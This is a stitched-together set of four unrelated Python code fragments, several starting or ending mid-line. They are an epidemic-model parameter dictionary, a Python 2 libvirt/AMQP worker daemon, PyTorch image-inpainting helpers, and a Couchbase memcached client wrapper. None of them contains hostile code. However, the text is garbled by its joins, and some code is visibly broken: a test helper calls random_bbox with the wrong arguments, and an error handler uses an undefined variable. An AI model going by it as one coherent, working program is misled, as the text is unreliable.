0.0606 * x * s * np.exp(a * t), 0, 0, 0],
'30-39_female_high': [0.1111 * x * l * np.exp(a * t), 0.1111 * x * (1 - s) * np.exp(a * t),
0.1111 * x * s * np.exp(a * t), 0, 0, 0],
'40-49_female_high': [0.0556 * x * l * np.exp(a * t), 0.0556 * x * (1 - s) * np.exp(a * t),
0.0556 * x * s * np.exp(a * t), 0, 0, 0],
'50-59_female_high': [0.0657 * x * l * np.exp(a * t), 0.0657 * x * (1 - s) * np.exp(a * t),
0.0657 * x * s * np.exp(a * t), 0, 0, 0],
'60-69_female_high': [0.0152 * x * l * np.exp(a * t), 0.0152 * x * (1 - scale['60-69'] * ferguson['60-69'][0]) * np.exp(a * t), 0.0152 * x * scale['60-69'] * ferguson['60-69'][0] * np.exp(a * t), 0, 0,
0],
'70-79_female_high': [0.0303 * x * l * np.exp(a * t), 0.0303 * x * (1 - scale['70-79'] * ferguson['70-79'][0]) * np.exp(a * t), 0.0303 * x * scale['70-79'] * ferguson['70-79'][0] * np.exp(a * t), 0, 0,
0],
'80+_female_high': [0.0000 * x * l * np.exp(a * t), 0.0000 * x * (1 - scale['80+'] * ferguson['80+'][0]) * np.exp(a * t), 0.0000 * x * scale['80+'] * ferguson['80+'][0] * np.exp(a * t), 0, 0, 0]
} if t < 22 else 0
init_vectors = {
's_0': s_0,
'i_0': {'30-39_male_high': [0, 0, 0, 0, 0, 0]}
}
model = MultiPopWrapper(
pop_categories={'age': ['0-9', '10-19', '20-29', '30-39', '40-49', '50-59', '60-69', '70-79', '80+'],
'sex': ['male', 'female'],
'density': ['high', 'low']
},
inf_labels=['AS', 'M', 'S', 'SI', 'H', 'ICU'],
alpha={'0-9': [asymptomatic_prop, (1 - asymptomatic_prop) * (1 - ferguson['0-9'][0]),
(1 - asymptomatic_prop) * ferguson['0-9'][0], 0, 0, 0],
'10-19': [asymptomatic_prop, (1 | |
#!/usr/bin/env python
# encoding: utf-8
"""
The main worker daemon library.
"""
from Queue import Queue
import twisted.internet
import twisted.internet.protocol
import twisted.internet.reactor
import twisted.internet.endpoints
from twisted.protocols import basic as twisted_basic
import argparse
import colorama
import imp
import json
import libvirt
import logging
import math
import multiprocessing
import netifaces
import os
import pika
import pymongo
import sh
import signal
import socket
import struct
import sys
import threading
import time
import traceback
import twisted
import uuid
from slave.amqp_man import AmqpManager
from slave.vm import VMHandler,ImageManager
import slave.models
class TalusFormatter(logging.Formatter):
"""Colorize the logs
"""
def __init__(self):
logging.Formatter.__init__(self)
def format(self, record):
msg = "{time} {level:<8} {name:<12} {message}".format(
time = self.formatTime(record),
level = record.levelname,
name = record.name,
message = record.getMessage()
)
# if the record has exc_info and it's not None, add it
# to the message
exc_info = getattr(record, "exc_info", None)
if exc_info is not None:
msg += "\n"
msg += "".join(traceback.format_exception(*exc_info))
color = ""
if record.levelno == logging.DEBUG:
color = colorama.Fore.BLUE
elif record.levelno == logging.WARNING:
color = colorama.Fore.YELLOW
elif record.levelno in [logging.ERROR, logging.CRITICAL, logging.FATAL]:
color = colorama.Fore.RED
elif record.levelno == logging.INFO:
color = colorama.Fore.WHITE
colorized = color + colorama.Style.BRIGHT + msg + colorama.Style.RESET_ALL
return colorized
logging.basicConfig(level=logging.DEBUG)
logging.getLogger("sh").setLevel(logging.WARN)
logging.getLogger().handlers[0].setFormatter(TalusFormatter())
def _signal_handler(signum=None, frame=None):
"""Shut down the running Master worker
:signum: Signal number (e.g. signal.SIGINT, etc)
:frame: Python frame (I think)
:returns: None
"""
logging.getLogger("Slave").info("handling signal")
Slave.instance().stop()
logging.shutdown()
def _install_sig_handlers():
"""Install signal handlers
"""
print("installing signal handlers")
signal.signal(signal.SIGINT, _signal_handler)
signal.signal(signal.SIGTERM, _signal_handler)
class LibvirtWrapper(object):
_lock = None
_conn = None
def __init__(self, log, uri="qemu:///system"):
# self._lock = threading.Lock()
self._uri = uri
self._conn = libvirt.open(self._uri)
self._l_log = log.getChild("LV")
self._can_be_used = threading.Event()
self._can_be_used.set()
self._lock = threading.Lock()
def restart_libvirtd(self):
self._l_log.debug("restarting libvirtd, waiting for lock")
self._can_be_used.clear()
self._l_log.debug("closing connection")
self._conn.close()
self._l_log.info("restarting libvirtd")
# this works better than `/etc/init.d/libvirt-bin restart` for some reason
os.system("/etc/init.d/libvirt-bin stop")
time.sleep(3)
os.system("killall -KILL libvirtd")
time.sleep(3)
os.system("/etc/init.d/libvirt-bin start")
self._l_log.info("sleeping for a bit until libvirt should be up")
time.sleep(10)
self._l_log.info("reconnecting to libvirt")
self._conn = libvirt.open(self._uri)
self._l_log.info("reconnected")
self._can_be_used.set()
def __getattr__(self, name):
if hasattr(self._conn, name):
val = getattr(self._conn, name)
if hasattr(val, "__call__"):
def wrapped(*args, **kwargs):
self._can_be_used.wait(2 ** 31)
return val(*args, **kwargs)
return wrapped
else:
return val
class GuestComms(twisted_basic.LineReceiver):
"""Communicates with the guest hosts as they start running. A
twisted LineReceiver.
"""
def connectionMade(self):
self.setRawMode()
self._unfinished_message = None
def rawDataReceived(self, data):
print("RECEIVED SOME DATA!!! {}".format(data))
while len(data) > 0:
if self._unfinished_message is not None:
remaining = self._unfinished_message_len - len(self._unfinished_message)
self._unfinished_message += data[0:remaining]
data = data[remaining:]
if len(self._unfinished_message) == self._unfinished_message_len:
self._handle_message(self._unfinished_message)
self._unfinished_message = None
else:
data_len = struct.unpack(">L", data[0:4])[0]
part = data[4:4 + data_len]
data = data[4 + data_len:]
if len(part) < data_len:
self._unfinished_message_len = data_len
self._unfinished_message = part
elif len(part) == data_len:
self._handle_message(part)
def _handle_message(self, message_data):
part_data = json.loads(message_data)
res = Slave.instance().handle_guest_comms(part_data)
if res is not None:
self.transport.write(res)
class GuestCommsFactory(twisted.internet.protocol.Factory):
"""The twisted protocol factory
"""
def buildProtocol(self, addr):
return GuestComms()
class Slave(threading.Thread):
"""The slave handler"""
AMQP_JOB_QUEUE = "jobs"
AMQP_JOB_STATUS_QUEUE = "job_status"
AMQP_JOB_PROPS = dict(
durable=True,
auto_delete=False,
exclusive=False
)
AMQP_BROADCAST_XCHG = "broadcast"
AMQP_SLAVE_QUEUE = "slaves"
AMQP_SLAVE_STATUS_QUEUE = "slave_status"
AMQP_SLAVE_PROPS = dict(
durable=True,
auto_delete=False,
exclusive=False,
)
AMQP_SLAVE_STATUS_PROPS = dict(
durable=True,
auto_delete=False,
exclusive=False,
)
_INSTANCE = None
@classmethod
def instance(cls, amqp_host=None, max_ram=None, max_cpus=None, intf=None, plugins_dir=None):
if cls._INSTANCE is None:
cls._INSTANCE = cls(amqp_host, max_ram, max_cpus, intf, plugins_dir)
return cls._INSTANCE
def __init__(self, amqp_host, max_ram, max_cpus, intf, plugins_dir=None):
"""Init the slave
:param str amqp_host: The hostname of the AMQP server
:param int max_ram: The total amount of usable ram (in MB) for VMs
:param int max_cpus: The total amount of cpu cores available for VMs
:param str intf: The interface to connecto the AMQP server through
:param str plugins_dir: The directory where plugins should be loaded from
"""
super(Slave, self).__init__()
self._max_cpus = max_cpus
self._max_ram = max_ram
# see #28 - configurable RAM/cpus
# of the form:
# {
# "KEY": {
# "lock" : <Semaphore>,
# "value" : <int>,
# },
# }
self._locks = {}
self._lock_init("ram", self._max_ram) # in MB!!
self._lock_init("cpus", self._max_cpus)
self._amqp_host = amqp_host
self._log = logging.getLogger("Slave")
self._plugins_dir = plugins_dir
self._load_plugins()
self._running = threading.Event()
self._slave_config_received = threading.Event()
self._amqp_man = AmqpManager.instance(self._amqp_host)
self._image_man = ImageManager.instance()
self._uuid = str(uuid.uuid4())
self._intf = intf
self._ip = netifaces.ifaddresses(self._intf)[2][0]['addr']
self._hostname = socket.gethostname()
# these will be set by the config amqp message
# see the _handle_config method
self._db_host = None
self._code_loc = None
self._already_consuming = False
self._handlers = []
self._handlers_lock = threading.Lock()
self._total_jobs_run = 0
self._libvirt_conn = None
self._gen_mac_addrs()
self._gen_vnc_ports()
self._libvirtd_can_be_used = threading.Event()
# not restarting, so set it (amqp jobs will wait on it when it's cleared)
self._libvirtd_can_be_used.set()
# restart every thousand vms
self._libvirtd_restart_vm_count = 1000
self._last_vm_started_evt = threading.Event()
self._last_vm_started_evt.set()
def _load_plugins(self):
"""Scan plugins directory, if provided, to discover all modules and load them"""
self._plugins = []
self._log.debug("plugins directory is '{}'".format(self._plugins_dir))
if self._plugins_dir == None:
return
# Find all files with .py extension, and all directories, and attempt to load them as modules
plugins_dir = os.path.abspath(self._plugins_dir)
for f in os.listdir(plugins_dir):
f_path = os.path.join(plugins_dir, f)
module_name, ext = os.path.splitext(f)
if ext <> '.py' and not os.path.isdir(f_path):
continue
try:
(mod_fp, pathname, description) = imp.find_module(module_name, [plugins_dir])
mod = imp.load_module(module_name, mod_fp, pathname, description)
self._log.info("imported plugin module {}".format(module_name))
self._plugins.append(mod)
except:
self._log.error("failed to import plugin module {}".format(module_name))
self._emit_plugin_event("init", [self, self._log])
def _emit_plugin_event(self, event, args):
try:
for plugin in self._plugins:
# Find function in module
if hasattr(plugin, 'on_{}'.format(event)):
self._log.debug("calling plugin handler on_{} on {}".format(event, plugin.__name__))
getattr(plugin, 'on_{}'.format(event))(*args)
except BaseException as e:
traceback.print_exc()
def _gen_mac_addrs(self):
self._mac_addrs = Queue()
base = "00:00:c0:a8:7b:{:02x}"
num = 2
for x in xrange(50):
new_mac = base.format(num + x)
ip = ".".join(map(lambda x: str(int(x, 16)), new_mac.split(":")[2:]))
# just testing this out...
sh.arp("-s", ip, new_mac)
self._mac_addrs.put(new_mac)
def _gen_vnc_ports(self):
self._vnc_ports = Queue()
for x in xrange(50):
self._vnc_ports.put(5900 + 5 + x)
def run(self):
self._running.set()
self._log.info("running")
self._amqp_man.declare_exchange(self.AMQP_BROADCAST_XCHG, "fanout")
self._amqp_man.declare_queue(self.AMQP_JOB_QUEUE, **self.AMQP_JOB_PROPS)
self._amqp_man.declare_queue(self.AMQP_JOB_STATUS_QUEUE, **self.AMQP_JOB_PROPS)
self._amqp_man.declare_queue(self.AMQP_SLAVE_QUEUE, **self.AMQP_SLAVE_PROPS)
self._amqp_man.declare_queue(self.AMQP_SLAVE_STATUS_QUEUE, **self.AMQP_SLAVE_STATUS_PROPS)
self._amqp_man.declare_queue(
self.AMQP_SLAVE_QUEUE + "_" + self._uuid,
exclusive=True
)
self._amqp_man.bind_queue(
exchange=self.AMQP_BROADCAST_XCHG,
queue=self.AMQP_SLAVE_QUEUE + "_" + self._uuid
)
self._amqp_man.do_start()
self._amqp_man.wait_for_ready()
self._amqp_man.queue_msg(
json.dumps(dict(
type="new",
uuid=self._uuid,
ip=self._ip,
hostname=self._hostname,
max_ram=self._max_ram,
max_cpus=self._max_cpus,
)),
self.AMQP_SLAVE_STATUS_QUEUE
)
self._amqp_man.consume_queue(self.AMQP_SLAVE_QUEUE, self._on_slave_all_received)
self._amqp_man.consume_queue(self.AMQP_SLAVE_QUEUE + "_" + self._uuid, self._on_slave_me_received)
self._log.info("waiting for slave config to be received")
self._status_update_thread = threading.Thread(target=self._do_update_status)
self._status_update_thread.daemon = True
self._status_update_thread.start()
while self._running.is_set():
time.sleep(0.2)
self._log.info("finished")
def stop(self):
"""
Stop the slave
"""
self._log.info("stopping!")
# logging module does not work from within a signal handler (which
# is where stop may be called from). See
# https://docs.python.org/2/library/logging.html#thread-safety
print("stopping!")
self._amqp_man.stop()
self._running.clear()
for handler in self._handlers:
handler.stop()
# wait for them all to finish!
handler.join()
self._log.info("all handlers have exited, goodbye")
print("all handlers have exited, goodbye")
logging.shutdown()
def cancel_job(self, job):
"""
Cancel the job with job id ``job``
:job: The job id to cancel
"""
for handler in self._handlers:
if handler.job == job:
self._log.debug("cancelling handler for job {}".format(job))
handler.stop()
self._log.warn("could not find handler for job {} to cancel".format(job))
# -----------------------
# guest comms
# -----------------------
def handle_guest_comms(self, data):
self._log.info("recieved guest comms! {}".format(str(data)[:100]))
if "type" not in data:
self._log.warn("type not found in guest comms data: {}".format(data))
return "{}"
switch = dict(
installing=self._handle_job_installing,
started=self._handle_job_started,
progress=self._handle_job_progress,
result=self._handle_job_result,
finished=self._handle_job_finished,
error=self._handle_job_error,
logs=self._handle_job_logs,
)
if data["type"] not in switch:
self._log.warn("unhandled guest comms type: {}".format(data["type"]))
return
return switch[data["type"]](data)
def _find_handler(self, job_id, idx):
"""Try to find the handler matching the specified ``job_id`` and ``idx``.
:param str job: The id of the job
:param int idx: The index of the job part
:returns: The found job handler or None
"""
found_handler = None
with self._handlers_lock:
for handler in self._handlers:
if handler.job == job_id and handler.idx == idx:
found_handler = handler
return found_handler
def _handle_job_installing(self, data):
"""Handle the installing message from the guest.
:param dict data: The data from the guest
:returns: None
"""
self._log.debug("Handling installing job part: {}:{}".format(data["job"], data["idx"]))
found_handler = self._find_handler(data["job"], data["idx"])
if found_handler is None:
self._log.warn("Could not find the handler for data: {}".format(data))
return
found_handler.on_received_guest_msg("installing")
self._last_vm_started_evt.set()
self._emit_plugin_event("job_installing", args=[data])
def _handle_job_started(self, data):
self._log.debug("handling started job part: {}:{}".format(data["job"], data["idx"]))
found_handler = self._find_handler(data["job"], data["idx"])
if found_handler is None:
self._log.warn("Cannot find the handler for data: {}".format(data))
return
found_handler.on_received_guest_msg("started")
self._emit_plugin_event("job_started", args=[data])
def _handle_job_error(self, data):
self._log.debug("handling job errors: {}:{}".format(data["job"], data["idx"]))
self._emit_plugin_event("job_error", args=[data])
self._amqp_man.queue_msg(
json.dumps(dict(
type="error",
tool=data["tool"],
idx=data["idx"],
job=data["job"],
data=data["data"]
)),
self.AMQP_JOB_STATUS_QUEUE
)
found_handler.on_received_guest_msg("error")
def _handle_job_logs(self, data):
self._log.debug("handling debug logs from job part: {}:{}".format(data["job"], data["idx"]))
self._emit_plugin_event("job_logs", args=[data])
self._amqp_man.queue_msg(
json.dumps(dict(
type="log",
tool=data["tool"],
idx=data["idx"],
job=data["job"],
data=data["data"]
)),
self.AMQP_JOB_STATUS_QUEUE
)
def | |
import os
import torch
import yaml
import numpy as np
from PIL import Image
from skimage import io
import torch.nn.functional as F
def pil_loader(path):
# open path as file to avoid ResourceWarning (https://github.com/python-pillow/Pillow/issues/835)
with open(path, 'rb') as f:
img = Image.open(f)
return img.convert('RGB')
def tif_loader(path):
aDiv = np.array(io.imread(path))
aDivMax = aDiv.max()
aDivMin = aDiv.min()
aDiv = (aDiv - aDivMin) / (aDivMax - aDivMin)
#aDiv = aDiv/aDivMax
h, w = aDiv.shape
aDiv = np.stack([aDiv, aDiv, aDiv], axis=2)
aDiv = np.asarray(aDiv, np.float32)
return aDiv
def default_loader(path):
return pil_loader(path)
#return tif_loader(path)
def tensor_img_to_npimg(tensor_img):
"""
Turn a tensor image with shape CxHxW to a numpy array image with shape HxWxC
:param tensor_img:
:return: a numpy array image with shape HxWxC
"""
if not (torch.is_tensor(tensor_img) and tensor_img.ndimension() == 3):
raise NotImplementedError("Not supported tensor image. Only tensors with dimension CxHxW are supported.")
npimg = np.transpose(tensor_img.numpy(), (1, 2, 0))
npimg = npimg.squeeze()
assert isinstance(npimg, np.ndarray) and (npimg.ndim in {2, 3})
return npimg
# Change the values of tensor x from range [0, 1] to [-1, 1]
def normalize(x):
#return x.mul_(2).add_(-1)
return x.mul_(2).add_(-1)
def transfer2tensor(x):
'''
transfer the ndarray of tif into tensor
Args:
x:
Returns:
'''
x = np.asarray(x, dtype=np.float32)
x_norm = x/4294967295
x_tensor = torch.from_numpy(x_norm)
x_tensor = x_tensor.float()
#x_tensor = torch.tensor(x_tensor.clone().detach(), dtype=torch.float32)
return x_tensor.mul_(2).add_(-0.6)
def same_padding(images, ksizes, strides, rates):
assert len(images.size()) == 4
batch_size, channel, rows, cols = images.size()
out_rows = (rows + strides[0] - 1) // strides[0]
out_cols = (cols + strides[1] - 1) // strides[1]
effective_k_row = (ksizes[0] - 1) * rates[0] + 1
effective_k_col = (ksizes[1] - 1) * rates[1] + 1
padding_rows = max(0, (out_rows-1)*strides[0]+effective_k_row-rows)
padding_cols = max(0, (out_cols-1)*strides[1]+effective_k_col-cols)
# Pad the input
padding_top = int(padding_rows / 2.)
padding_left = int(padding_cols / 2.)
padding_bottom = padding_rows - padding_top
padding_right = padding_cols - padding_left
paddings = (padding_left, padding_right, padding_top, padding_bottom)
images = torch.nn.ZeroPad2d(paddings)(images)
return images
def extract_image_patches(images, ksizes, strides, rates, padding='same'):
"""
Extract patches from images and put them in the C output dimension.
:param padding:
:param images: [batch, channels, in_rows, in_cols]. A 4-D Tensor with shape
:param ksizes: [ksize_rows, ksize_cols]. The size of the sliding window for
each dimension of images
:param strides: [stride_rows, stride_cols]
:param rates: [dilation_rows, dilation_cols]
:return: A Tensor
"""
assert len(images.size()) == 4
assert padding in ['same', 'valid']
batch_size, channel, height, width = images.size()
if padding == 'same':
images = same_padding(images, ksizes, strides, rates)
elif padding == 'valid':
pass
else:
raise NotImplementedError('Unsupported padding type: {}.\
Only "same" or "valid" are supported.'.format(padding))
unfold = torch.nn.Unfold(kernel_size=ksizes,
dilation=rates,
padding=0,
stride=strides)
patches = unfold(images)
return patches # [N, C*k*k, L], L is the total number of such blocks
# def random_bbox(config, batch_size):
# """Generate a random tlhw with configuration.
#
# Args:
# config: Config should have configuration including img
#
# Returns:
# tuple: (top, left, height, width)
#
# """
# img_height, img_width, _ = config['image_shape']
# h, w = config['mask_shape']
# margin_height, margin_width = config['margin']
# maxt = img_height - margin_height - h
# maxl = img_width - margin_width - w
# bbox_list = []
# if config['mask_batch_same']:
# t = np.random.randint(margin_height, maxt)
# l = np.random.randint(margin_width, maxl)
# bbox_list.append((t, l, h, w))
# bbox_list = bbox_list * batch_size
# else:
# for i in range(batch_size):
# t = np.random.randint(margin_height, maxt)
# l = np.random.randint(margin_width, maxl)
# bbox_list.append((t, l, h, w))
#
# return torch.tensor(bbox_list, dtype=torch.int64)
def random_bbox(config, batch_size):
"""Generate a random tlhw with configuration.
Args:
config: Config should have configuration including img
Returns:
tuple: (top, left, height, width)
"""
img_height, img_width, _ = config['image_shape']
h, w = config['mask_shape']
margin_height, margin_width = config['margin']
maxt = img_height - margin_height - h
maxl = img_width - margin_width - w
bbox_list = []
if config['mask_batch_same']:
#t = np.random.randint(margin_height, maxt)
#l = np.random.randint(margin_width, maxl)
t = (img_height - h)//2 ## center mask
l = (img_width - w) //2
bbox_list.append((t, l, h, w))
bbox_list = bbox_list * batch_size
else:
for i in range(batch_size):
# t = np.random.randint(margin_height, maxt)
# l = np.random.randint(margin_width, maxl)
t = (img_height - h) // 2 ## center mask
l = (img_width - w) // 2
bbox_list.append((t, l, h, w))
return torch.tensor(bbox_list, dtype=torch.int64)
def test_random_bbox():
image_shape = [256, 256, 3]
mask_shape = [128, 128]
margin = [0, 0]
bbox = random_bbox(image_shape)
return bbox
def bbox2mask(bboxes, height, width, max_delta_h, max_delta_w):
batch_size = bboxes.size(0)
mask = torch.zeros((batch_size, 1, height, width), dtype=torch.float32)
for i in range(batch_size):
bbox = bboxes[i]
#delta_h = np.random.randint(max_delta_h // 2 + 1)
#delta_w = np.random.randint(max_delta_w // 2 + 1)
delta_h = 0
delta_w = 0
mask[i, :, bbox[0] + delta_h:bbox[0] + bbox[2] - delta_h, bbox[1] + delta_w:bbox[1] + bbox[3] - delta_w] = 1.
return mask
def test_bbox2mask():
image_shape = [256, 256, 3]
mask_shape = [128, 128]
margin = [0, 0]
max_delta_shape = [32, 32]
bbox = random_bbox(image_shape)
mask = bbox2mask(bbox, image_shape[0], image_shape[1], max_delta_shape[0], max_delta_shape[1])
return mask
def local_patch(x, bbox_list):
assert len(x.size()) == 4
patches = []
for i, bbox in enumerate(bbox_list):
t, l, h, w = bbox
patches.append(x[i, :, t:t + h, l:l + w])
return torch.stack(patches, dim=0)
def mask_image(x, bboxes, config):
height, width, _ = config['image_shape']
max_delta_h, max_delta_w = config['max_delta_shape']
mask = bbox2mask(bboxes, height, width, max_delta_h, max_delta_w)
if x.is_cuda:
mask = mask.cuda()
if config['mask_type'] == 'hole':
#print(x.shape)
#print('Mask ', mask.shape)
result = x * (1. - mask)
elif config['mask_type'] == 'mosaic':
# TODO: Matching the mosaic patch size and the mask size
mosaic_unit_size = config['mosaic_unit_size']
downsampled_image = F.interpolate(x, scale_factor=1. / mosaic_unit_size, mode='nearest')
upsampled_image = F.interpolate(downsampled_image, size=(height, width), mode='nearest')
result = upsampled_image * mask + x * (1. - mask)
else:
raise NotImplementedError('Not implemented mask type.')
return result, mask
def spatial_discounting_mask(config):
"""Generate spatial discounting mask constant.
Spatial discounting mask is first introduced in publication:
Generative Image Inpainting with Contextual Attention, Yu et al.
Args:
config: Config should have configuration including HEIGHT, WIDTH,
DISCOUNTED_MASK.
Returns:
tf.Tensor: spatial discounting mask
"""
gamma = config['spatial_discounting_gamma']
height, width = config['mask_shape']
shape = [1, 1, height, width]
if config['discounted_mask']:
mask_values = np.ones((height, width))
for i in range(height):
for j in range(width):
mask_values[i, j] = max(
gamma ** min(i, height - i),
gamma ** min(j, width - j))
mask_values = np.expand_dims(mask_values, 0)
mask_values = np.expand_dims(mask_values, 0)
else:
mask_values = np.ones(shape)
spatial_discounting_mask_tensor = torch.tensor(mask_values, dtype=torch.float32)
if config['cuda']:
spatial_discounting_mask_tensor = spatial_discounting_mask_tensor.cuda()
return spatial_discounting_mask_tensor
def reduce_mean(x, axis=None, keepdim=False):
if not axis:
axis = range(len(x.shape))
for i in sorted(axis, reverse=True):
x = torch.mean(x, dim=i, keepdim=keepdim)
return x
def reduce_std(x, axis=None, keepdim=False):
if not axis:
axis = range(len(x.shape))
for i in sorted(axis, reverse=True):
x = torch.std(x, dim=i, keepdim=keepdim)
return x
def reduce_sum(x, axis=None, keepdim=False):
if not axis:
axis = range(len(x.shape))
for i in sorted(axis, reverse=True):
x = torch.sum(x, dim=i, keepdim=keepdim)
return x
def flow_to_image(flow):
"""Transfer flow map to image.
Part of code forked from flownet.
"""
out = []
maxu = -999.
maxv = -999.
minu = 999.
minv = 999.
maxrad = -1
for i in range(flow.shape[0]):
u = flow[i, :, :, 0]
v = flow[i, :, :, 1]
idxunknow = (abs(u) > 1e7) | (abs(v) > 1e7)
u[idxunknow] = 0
v[idxunknow] = 0
maxu = max(maxu, np.max(u))
minu = min(minu, np.min(u))
maxv = max(maxv, np.max(v))
minv = min(minv, np.min(v))
rad = np.sqrt(u ** 2 + v ** 2)
maxrad = max(maxrad, np.max(rad))
u = u / (maxrad + np.finfo(float).eps)
v = v / (maxrad + np.finfo(float).eps)
img = compute_color(u, v)
out.append(img)
return np.float32(np.uint8(out))
def pt_flow_to_image(flow):
"""Transfer flow map to image.
Part of code forked from flownet.
"""
out = []
maxu = torch.tensor(-999)
maxv = torch.tensor(-999)
minu = torch.tensor(999)
minv = torch.tensor(999)
maxrad = torch.tensor(-1)
if torch.cuda.is_available():
maxu = maxu.cuda()
maxv = maxv.cuda()
minu = minu.cuda()
minv = minv.cuda()
maxrad = maxrad.cuda()
for i in range(flow.shape[0]):
u = flow[i, 0, :, :]
v = flow[i, 1, :, :]
idxunknow = (torch.abs(u) > 1e7) + (torch.abs(v) > 1e7)
u[idxunknow] = 0
v[idxunknow] = 0
maxu = torch.max(maxu, torch.max(u))
minu = torch.min(minu, torch.min(u))
maxv = torch.max(maxv, torch.max(v))
minv = torch.min(minv, torch.min(v))
rad = torch.sqrt((u ** 2 + v ** 2).float()).to(torch.int64)
maxrad = torch.max(maxrad, torch.max(rad))
u = u / (maxrad + torch.finfo(torch.float32).eps)
v = v / (maxrad + torch.finfo(torch.float32).eps)
# TODO: change the following to pytorch
img = pt_compute_color(u, v)
out.append(img)
return torch.stack(out, dim=0)
def highlight_flow(flow):
"""Convert | |
set([self._get_vBucket_id(key)]),
forward_map=self._parse_not_my_vbucket_error(error))
vb_error += 1
else:
raise error
except (EOFError, socket.error) as error:
if "Got empty data (remote died?)" in error.message or \
"Timeout waiting for socket" in error.message or \
"Broken pipe" in error.message or \
"Connection reset by peer" in error.message and vb_error < 5:
self.reset_vbuckets(self.rest,
set([self._get_vBucket_id(key)]))
vb_error += 1
else:
raise error
except BaseException as error:
if vb_error < 5:
self.reset_vbuckets(self.rest, set([self._get_vBucket_id(key)]))
vb_error += 1
else:
raise error
return new_func
# SUBDOCS
@aware_call
def counter_sd(self, key, path, value, expiry=0, opaque=0, cas=0, create=False):
return self._send_op(self.memcached(key).counter_sd, key, path, value, expiry=expiry, opaque=opaque, cas=cas, create=create)
@aware_call
def array_add_insert_sd(self, key, path, value, expiry=0, opaque=0, cas=0, create=False):
return self._send_op(self.memcached(key).array_add_insert_sd, key, path, value, expiry=expiry, opaque=opaque, cas=cas, create=create)
@aware_call
def array_add_unique_sd(self, key, path, value, expiry=0, opaque=0, cas=0, create=False):
return self._send_op(self.memcached(key).array_add_unique_sd, key, path, value, expiry=expiry, opaque=opaque, cas=cas, create=create)
@aware_call
def array_push_first_sd(self, key, path, value, expiry=0, opaque=0, cas=0, create=False):
return self._send_op(self.memcached(key).array_push_first_sd, key, path, value, expiry=expiry, opaque=opaque, cas=cas, create=create)
@aware_call
def array_push_last_sd(self, key, path, value, expiry=0, opaque=0, cas=0, create=False):
return self._send_op(self.memcached(key).array_push_last_sd, key, path, value, expiry=expiry, opaque=opaque, cas=cas, create=create)
@aware_call
def replace_sd(self, key, path, value, expiry=0, opaque=0, cas=0, create=False):
return self._send_op(self.memcached(key).replace_sd, key, path, value, expiry=expiry, opaque=opaque, cas=cas, create=create)
@aware_call
def delete_sd(self, key, path, opaque=0, cas=0):
return self._send_op(self.memcached(key).delete_sd, key, path, opaque=opaque, cas=cas)
@aware_call
def dict_upsert_sd(self, key, path, value, expiry=0, opaque=0, cas=0, create=False):
return self._send_op(self.memcached(key).dict_upsert_sd, key, path, value, expiry=expiry, opaque=opaque, cas=cas, create=create)
@aware_call
def dict_add_sd(self, key, path, value, expiry=0, opaque=0, cas=0, create=False):
return self._send_op(self.memcached(key).dict_add_sd, key, path, value, expiry=expiry, opaque=opaque, cas=cas, create=create)
@aware_call
def exists_sd(self, key, path, cas=0):
return self._send_op(self.memcached(key).exists_sd, key, path, cas=cas)
@aware_call
def get_sd(self, key, path, cas=0):
return self._send_op(self.memcached(key).get_sd, key, path, cas=cas)
@aware_call
def set(self, key, exp, flags, value):
return self._send_op(self.memcached(key).set, key, exp, flags, value)
@aware_call
def append(self, key, value):
return self._send_op(self.memcached(key).append, key, value)
@aware_call
def observe(self, key):
return self._send_op(self.memcached(key).observe, key)
@aware_call
def observe_seqno(self, key, vbucket_uuid):
return self._send_op(self.memcached(key).observe_seqno, key, vbucket_uuid)
# This saves a lot of repeated code - the func is the mc bin client function
def generic_request(self, func, *args):
key = args[0]
vb_error = 0
while True:
try:
return self._send_op(func, *args)
except MemcachedError as error:
if error.status == ERR_NOT_MY_VBUCKET and vb_error < 5:
self.reset_vbuckets(self.rest, set([self._get_vBucket_id(key)]),
forward_map=self._parse_not_my_vbucket_error(error))
vb_error += 1
else:
raise error
except (EOFError, socket.error) as error:
if "Got empty data (remote died?)" in error.message \
or "Timeout waiting for socket" in error.message \
or "Broken pipe" in error.message \
or "Connection reset by peer" in error.message \
and vb_error < 5:
self.reset_vbuckets(self.rest, set([self._get_vBucket_id(key)]))
vb_error += 1
if vb_error >= 5:
raise error
else:
raise error
except BaseException as error:
if vb_error < 5:
self.reset_vbuckets(self.rest, set([self._get_vBucket_id(key)]))
self.log.info("********** Resetting vbucket id **********")
vb_error += 1
else:
raise error
def get(self, key):
vb_error = 0
while True:
try:
return self._send_op(self.memcached(key).get, key)
except MemcachedError as error:
if error.status == ERR_NOT_MY_VBUCKET and vb_error < 5:
self.reset_vbuckets(self.rest, set([self._get_vBucket_id(key)]),
forward_map=self._parse_not_my_vbucket_error(error))
vb_error += 1
else:
raise error
except (EOFError, socket.error) as error:
if "Got empty data (remote died?)" in error.message \
or "Timeout waiting for socket" in error.message \
or "Broken pipe" in error.message \
or "Connection reset by peer" in error.message \
and vb_error < 5:
self.reset_vbuckets(self.rest, set([self._get_vBucket_id(key)]))
vb_error += 1
else:
raise error
except BaseException as error:
if vb_error < 5:
self.reset_vbuckets(self.rest, set([self._get_vBucket_id(key)]))
vb_error += 1
else:
raise error
def getr(self, key, replica_index=0):
vb_error = 0
while True:
try:
vBucketId = self._get_vBucket_id(key)
return self._send_op(self.memcached(key, replica_index=replica_index).getr, key)
except MemcachedError as error:
if error.status == ERR_NOT_MY_VBUCKET and vb_error < 5:
self.reset_vbuckets(self.rest, set([self._get_vBucket_id(key)]),
forward_map=self._parse_not_my_vbucket_error(error))
vb_error += 1
else:
raise error
except (EOFError, socket.error) as error:
if "Got empty data (remote died?)" in error.message \
or "Timeout waiting for socket" in error.message \
or "Broken pipe" in error.message \
or "Connection reset by peer" in error.message \
and vb_error < 5:
self.reset_vbuckets(self.rest, set([self._get_vBucket_id(key)]))
vb_error += 1
else:
raise error
except BaseException as error:
if vb_error < 5:
self.reset_vbuckets(self.rest, set([self._get_vBucket_id(key)]))
vb_error += 1
else:
raise error
def setMulti(self, exp, flags, key_val_dic, pause_sec=1, timeout_sec=5, parallel=False):
if parallel:
self._setMulti_parallel(exp, flags, key_val_dic, pause_sec, timeout_sec)
else:
self._setMulti_seq(exp, flags, key_val_dic, pause_sec, timeout_sec)
def _setMulti_seq(self, exp, flags, key_val_dic, pause_sec=1, timeout_sec=5):
# set keys in their respective vbuckets and identify the server for each vBucketId
server_keyval = self._get_server_keyval_dic(key_val_dic)
# get memcached client against each server and multi set
for server_str , keyval in server_keyval.items():
#if the server has been removed after server_keyval has been gotten
if server_str not in self.memcacheds:
self._setMulti_seq(exp, flags, key_val_dic, pause_sec, timeout_sec)
else:
